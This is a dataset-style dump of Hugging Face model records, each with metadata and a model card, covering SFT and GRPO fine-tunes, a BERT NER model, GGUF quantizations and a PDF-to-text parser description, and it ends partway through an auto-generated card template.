modelId
stringlengths 5
139
| author
stringlengths 2
42
| last_modified
timestamp[us, tz=UTC]date 2020-02-15 11:33:14
2025-06-01 00:49:44
| downloads
int64 0
223M
| likes
int64 0
11.7k
| library_name
stringclasses 461
values | tags
sequencelengths 1
4.05k
| pipeline_tag
stringclasses 54
values | createdAt
timestamp[us, tz=UTC]date 2022-03-02 23:29:04
2025-06-01 00:49:44
| card
stringlengths 11
1.01M
|
---|---|---|---|---|---|---|---|---|---|
PepitaxX/qwen3-0.6B-openQA_finetune_mmlu_fullprompt | PepitaxX | 2025-05-30T10:48:29Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"unsloth",
"trl",
"sft",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-05-30T10:47:58Z | ---
library_name: transformers
tags:
- unsloth
- trl
- sft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
elliotthwang/outputs | elliotthwang | 2025-05-30T10:43:35Z | 0 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"generated_from_trainer",
"trl",
"sft",
"base_model:mistralai/Mistral-7B-Instruct-v0.2",
"base_model:finetune:mistralai/Mistral-7B-Instruct-v0.2",
"endpoints_compatible",
"region:us"
] | null | 2025-04-14T09:43:55Z | ---
base_model: mistralai/Mistral-7B-Instruct-v0.2
library_name: transformers
model_name: outputs
tags:
- generated_from_trainer
- trl
- sft
licence: license
---
# Model Card for outputs
This model is a fine-tuned version of [mistralai/Mistral-7B-Instruct-v0.2](https://huggingface.co/mistralai/Mistral-7B-Instruct-v0.2).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="elliotthwang/outputs", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
This model was trained with SFT.
### Framework versions
- TRL: 0.18.1
- Transformers: 4.52.2
- Pytorch: 2.6.0+cu124
- Datasets: 3.6.0
- Tokenizers: 0.21.1
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
``` |
zadazada/Qwen2.5-0.5B-Instruct-Gensyn-Swarm-slow_dense_bee | zadazada | 2025-05-30T10:42:09Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"generated_from_trainer",
"rl-swarm",
"grpo",
"gensyn",
"I am slow dense bee",
"unsloth",
"trl",
"arxiv:2402.03300",
"base_model:Gensyn/Qwen2.5-0.5B-Instruct",
"base_model:finetune:Gensyn/Qwen2.5-0.5B-Instruct",
"endpoints_compatible",
"region:us"
] | null | 2025-05-29T12:03:41Z | ---
base_model: Gensyn/Qwen2.5-0.5B-Instruct
library_name: transformers
model_name: Qwen2.5-0.5B-Instruct-Gensyn-Swarm-slow_dense_bee
tags:
- generated_from_trainer
- rl-swarm
- grpo
- gensyn
- I am slow dense bee
- unsloth
- trl
licence: license
---
# Model Card for Qwen2.5-0.5B-Instruct-Gensyn-Swarm-slow_dense_bee
This model is a fine-tuned version of [Gensyn/Qwen2.5-0.5B-Instruct](https://huggingface.co/Gensyn/Qwen2.5-0.5B-Instruct).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="zadazada/Qwen2.5-0.5B-Instruct-Gensyn-Swarm-slow_dense_bee", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.15.2
- Transformers: 4.48.2
- Pytorch: 2.5.1
- Datasets: 3.6.0
- Tokenizers: 0.21.1
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
``` |
JingyaoLi/ScienceLLaMA-3b | JingyaoLi | 2025-05-30T10:39:39Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"llama-factory",
"full",
"generated_from_trainer",
"conversational",
"base_model:meta-llama/Llama-3.2-3B-Instruct",
"base_model:finetune:meta-llama/Llama-3.2-3B-Instruct",
"license:other",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-05-30T06:44:54Z | ---
library_name: transformers
license: other
base_model: meta-llama/Llama-3.2-3B-Instruct
tags:
- llama-factory
- full
- generated_from_trainer
model-index:
- name: ScienceLLaMA-3B
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# ScienceLLaMA-3B
<p align="center">
• 🤗 <a href="https://huggingface.co/datasets/JingyaoLi/Science-Logits-1.2M" target="_blank">Data </a>
• 🤗 <a href="https://huggingface.co/JingyaoLi/ScienceLLaMA-3b" target="_blank">ScienceLLaMA-3B </a>
• 🤗 <a href="https://huggingface.co/JingyaoLi/ScienceLLaMA-1b" target="_blank">ScienceLLaMA-1B </a>
• 🐱 <a href="Logits-based Finetuning" target="_blank">Code</a>
• 📃 Paper (TO be released) <br>
</p>
This model is a fine-tuned with **Logits-Based Finetuning** on the [JingyaoLi/Science-Logits-1.2M](https://huggingface.co/datasets/JingyaoLi/Science-Logits-1.2M), which integrates the strengths of supervised learning and knowledge distillation by combining teacher logits with ground truth labels. This preserves both correctness and linguistic diversity.
<div style="text-align: center;">
<img src="./images/example.png" alt="example" />
</div>
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 1e-06
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- distributed_type: multi-GPU
- num_devices: 8
- gradient_accumulation_steps: 4
- total_train_batch_size: 256
- total_eval_batch_size: 64
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: cosine
- lr_scheduler_warmup_ratio: 0.1
- num_epochs: 1
### Training results
### Framework versions
- Transformers 4.45.0
- Pytorch 2.4.0+cu121
- Datasets 2.21.0
- Tokenizers 0.20.1
|
kalle07/pdf2txt_parser_converter | kalle07 | 2025-05-30T10:36:53Z | 0 | 4 | null | [
"parser",
"parsing",
"PDF",
"pdfplumber",
"docling",
"txt",
"tables",
"python",
"windows",
"RAG",
"en",
"de",
"region:us"
] | null | 2025-05-13T14:52:51Z | ---
language:
- en
- de
tags:
- parser
- parsing
- PDF
- pdfplumber
- docling
- txt
- tables
- python
- windows
- RAG
---
# <b>PDF to TXT converter ready to chunck for your RAG</b>
<b>ONLY WINDOWS</b><br>
<b>EXE and PY available (en and german)</b><br>
better input = better output<br>
<b>⇨</b> give me a ❤️, if you like ;)<br><br>
...
Most LLM applications only convert your PDF simple to txt, nothing more, its like you save your PDF as txt file. Blocks of text that are close together are often mixed up and tables cannot be read logically.
Therefore its better to convert it with some help of a <b>"Parser"</b>. The embedder can now find a better context.<br>
I work with "<b>pdfplumber/pdfminer</b>" none OCR, so its very fast!<br>
<ul style="line-height: 1.05;">
<li>Works with single and multi pdf list, works with folder</li>
<li>Intelligent multiprocessing</li>
<li>Error tolerant, that means if your PDF is not convertible, it will be skipped, no special handling</li>
<li>Instant view of the result, hit one pdf on top of the list</li>
<li>Converts some common tables as json-foramt inside the txt file, readable for embedder</li>
<li>Adds the absolute PAGE number to each page</li>
<li>Adds the label “Chapter” for large font and/or “important” for bold font</li>
<li>tested on 300 PDF files ~30000 pages</li>
<li>All txt files will be created in original folder of PDF</li>
<li>All previous txt files are overwritten</li>
<li>aprox 5 to 20 Pages/sec - depends on complexity</li>
<li>tested on 300 PDF files ~30000 pages</li>
</ul>
<br>
This I have created with my brain and the help of chatGPT, Iam not a coder... sorry so I will not fulfill any wishes unless there are real errors.<br>
It is really hard for me with GUI and the Function and in addition to compile it.<br>
For the python-file you need to import missing libraries.<br>
Of course there is a lot of need for optimization(save/error-handling) or the use of other parser libraries, but it's a start.
the example codes process about 10-15 pages/sec.
<br><br>
...
<br>
I also have a "<b>docling</b>" parser with OCR (GPU is need for fast processing), its only be a python-file, not compiled.<br>
You have to download all libs, and if you start (first time) internal also OCR models are downloaded. At the moment i have prepared a kind of multi docling,
the number of parallel processed PDFs depend on VRAM and if you use OCR only for tables or for all. I have set VRAM = 16GB (my GPU RAM, you should set yours) and the multiple calls for docling are VRAM/1.3,
so it uses ~12GB (in my version) and processes 12 PDFs at once, only txt and tables are converted, so no images no diagrams (to process pages in parallel its to complicate). For now all PDFs must be same folder like the python file.
If you change OCR for all the VRAM consum is rasing you have to set 1.3 to 2 or more.
<br><br>
<b>now have fun and leave a comment if you like ;)</b><br>
on discord "sevenof9"
<br>
my embedder collection:<br>
https://huggingface.co/kalle07/embedder_collection
<br>
<br>
I am not responsible for any errors or crashes on your system. If you use it, you take full responsibility! |
mradermacher/Flex-VL-7B-GGUF | mradermacher | 2025-05-30T10:36:37Z | 0 | 0 | transformers | [
"transformers",
"gguf",
"en",
"base_model:jongwooko/Flex-VL-7B",
"base_model:quantized:jongwooko/Flex-VL-7B",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2025-05-30T10:10:40Z | ---
base_model: jongwooko/Flex-VL-7B
language:
- en
library_name: transformers
quantized_by: mradermacher
tags: []
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
static quants of https://huggingface.co/jongwooko/Flex-VL-7B
<!-- provided-files -->
weighted/imatrix quants seem not to be available (by me) at this time. If they do not show up a week or so after the static ones, I have probably not planned for them. Feel free to request them by opening a Community Discussion.
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/Flex-VL-7B-GGUF/resolve/main/Flex-VL-7B.Q2_K.gguf) | Q2_K | 3.1 | |
| [GGUF](https://huggingface.co/mradermacher/Flex-VL-7B-GGUF/resolve/main/Flex-VL-7B.Q3_K_S.gguf) | Q3_K_S | 3.6 | |
| [GGUF](https://huggingface.co/mradermacher/Flex-VL-7B-GGUF/resolve/main/Flex-VL-7B.Q3_K_M.gguf) | Q3_K_M | 3.9 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/Flex-VL-7B-GGUF/resolve/main/Flex-VL-7B.Q3_K_L.gguf) | Q3_K_L | 4.2 | |
| [GGUF](https://huggingface.co/mradermacher/Flex-VL-7B-GGUF/resolve/main/Flex-VL-7B.IQ4_XS.gguf) | IQ4_XS | 4.4 | |
| [GGUF](https://huggingface.co/mradermacher/Flex-VL-7B-GGUF/resolve/main/Flex-VL-7B.Q4_K_S.gguf) | Q4_K_S | 4.6 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Flex-VL-7B-GGUF/resolve/main/Flex-VL-7B.Q4_K_M.gguf) | Q4_K_M | 4.8 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Flex-VL-7B-GGUF/resolve/main/Flex-VL-7B.Q5_K_S.gguf) | Q5_K_S | 5.4 | |
| [GGUF](https://huggingface.co/mradermacher/Flex-VL-7B-GGUF/resolve/main/Flex-VL-7B.Q5_K_M.gguf) | Q5_K_M | 5.5 | |
| [GGUF](https://huggingface.co/mradermacher/Flex-VL-7B-GGUF/resolve/main/Flex-VL-7B.Q6_K.gguf) | Q6_K | 6.4 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/Flex-VL-7B-GGUF/resolve/main/Flex-VL-7B.Q8_0.gguf) | Q8_0 | 8.2 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/Flex-VL-7B-GGUF/resolve/main/Flex-VL-7B.f16.gguf) | f16 | 15.3 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time. Additional thanks to [@nicoboss](https://huggingface.co/nicoboss) for giving me access to his private supercomputer, enabling me to provide many more imatrix quants, at much higher quality, than I would otherwise be able to.
<!-- end -->
|
jeongseokoh/qwen3_8b-with-conclusion-Alphabet_False_Multiple2_aggr_last_starting_with_inst | jeongseokoh | 2025-05-30T10:36:05Z | 21 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-05-29T18:25:31Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
artseredaru/asdty | artseredaru | 2025-05-30T10:30:48Z | 0 | 0 | null | [
"license:apache-2.0",
"region:us"
] | null | 2025-05-30T10:30:48Z | ---
license: apache-2.0
---
|
wongyaping/bert-finetuned-ner | wongyaping | 2025-05-30T10:30:39Z | 11 | 0 | transformers | [
"transformers",
"safetensors",
"bert",
"token-classification",
"generated_from_trainer",
"dataset:conll2003",
"base_model:google-bert/bert-base-cased",
"base_model:finetune:google-bert/bert-base-cased",
"license:apache-2.0",
"model-index",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | token-classification | 2025-05-29T17:34:38Z | ---
library_name: transformers
license: apache-2.0
base_model: bert-base-cased
tags:
- generated_from_trainer
datasets:
- conll2003
metrics:
- precision
- recall
- f1
- accuracy
model-index:
- name: bert-finetuned-ner
results:
- task:
name: Token Classification
type: token-classification
dataset:
name: conll2003
type: conll2003
config: conll2003
split: validation
args: conll2003
metrics:
- name: Precision
type: precision
value: 0.9329913964262078
- name: Recall
type: recall
value: 0.9490070683271625
- name: F1
type: f1
value: 0.9409310862673118
- name: Accuracy
type: accuracy
value: 0.9860775887443339
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# bert-finetuned-ner
This model is a fine-tuned version of [bert-base-cased](https://huggingface.co/bert-base-cased) on the conll2003 dataset.
It achieves the following results on the evaluation set:
- Loss: 0.0643
- Precision: 0.9330
- Recall: 0.9490
- F1: 0.9409
- Accuracy: 0.9861
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 3
### Training results
| Training Loss | Epoch | Step | Validation Loss | Precision | Recall | F1 | Accuracy |
|:-------------:|:-----:|:----:|:---------------:|:---------:|:------:|:------:|:--------:|
| 0.0745 | 1.0 | 1756 | 0.0656 | 0.9098 | 0.9382 | 0.9238 | 0.9832 |
| 0.0336 | 2.0 | 3512 | 0.0713 | 0.9336 | 0.9436 | 0.9386 | 0.9851 |
| 0.0214 | 3.0 | 5268 | 0.0643 | 0.9330 | 0.9490 | 0.9409 | 0.9861 |
### Framework versions
- Transformers 4.52.3
- Pytorch 2.5.1
- Datasets 3.3.2
- Tokenizers 0.21.0
|
exala/db_slr_7.1.2 | exala | 2025-05-30T10:30:10Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"distilbert",
"text-classification",
"arxiv:1910.09700",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2025-05-30T10:29:42Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
muqtasid87/qwen2.5vl-finetune-platesmania-dataset-v1_qv | muqtasid87 | 2025-05-30T10:26:05Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-05-30T10:25:59Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
